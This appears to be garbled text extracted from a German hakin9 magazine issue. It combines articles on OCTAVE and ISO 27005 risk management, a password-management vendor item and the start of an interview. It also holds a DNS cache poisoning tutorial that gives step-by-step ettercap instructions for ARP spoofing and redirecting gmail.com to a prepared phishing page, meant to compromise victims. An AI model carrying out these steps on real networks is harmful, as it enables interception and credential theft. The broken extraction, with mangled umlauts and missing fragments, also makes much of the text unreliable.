wie die erstellte Schutzstrategie und der Plan zur Risikoreduzierung umgesetzt werden kann
Handlungs-Planes
UumlberwachenBeobachten des Handlungsplanes nach Effektivitaumlt Das beinhaltet zB das Beobachten der Risiken fuumlr jede Aumlnderung
ken
Die OCTAVE Methode ersetzt kein Risikomanagement sondern gehoumlrt in ein strukturiertes Risikomanage-
Abbildung 4 Octave und Risikomanagement
10201028
ABWEHR
ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst 